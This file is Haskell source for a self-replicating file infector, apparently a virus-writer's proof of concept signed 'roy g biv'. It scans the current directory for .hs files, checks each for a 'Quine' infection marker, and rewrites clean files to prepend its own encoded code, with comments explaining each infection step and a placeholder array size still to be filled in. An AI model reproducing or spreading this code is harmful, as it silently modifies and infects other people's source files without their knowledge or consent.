import Data.Array
import Data.Text
import Data.ByteString.Char8
import Data.List
import Data.Char
import System.Directory
a b=do
 let c=listArray(1,xxx)[]                                                                     -- place atoi(code) in here first, all up to "listArray(1," and all from "if(Data"
 if(Data.List.isSuffixOf".hs"(Data.Text.unpack(Data.Text.toLower(Data.Text.pack(b)))))then do -- find all .hs files
  d<-Prelude.readFile b                                                                       -- read entire file
  let(e,f)=breakSubstring(Data.ByteString.Char8.pack("Quine"))(Data.ByteString.Char8.pack(d)) -- check for infection marker
  if(f==Data.ByteString.Char8.pack(""))then do
   let(e,f)=Data.List.partition(Data.List.isPrefixOf"import")(Prelude.lines d)                -- separate import lines from rest of code
   let(g,h)=bounds(c)                                                                         -- get array size
   Prelude.writeFile b(Data.List.unlines(e)++[chr(c!i)|i<-[1..148]]++show(h)++")"++show[(c!i)|i<-[1..h]]++[chr(c!i)|i<-[149..h]]++Data.List.unlines(f)++"quine")
                                                                                              -- write host import lines and our import lines
                                                                                              -- place array declaration and itoa entire code
                                                                                              -- and plaintext code and rest of code and final line
  else return()
 else return()
quine=do
 b<-getDirectoryContents"."
 mapM_(a)b--Quine - roy g biv 05/04/13

main = do
quine
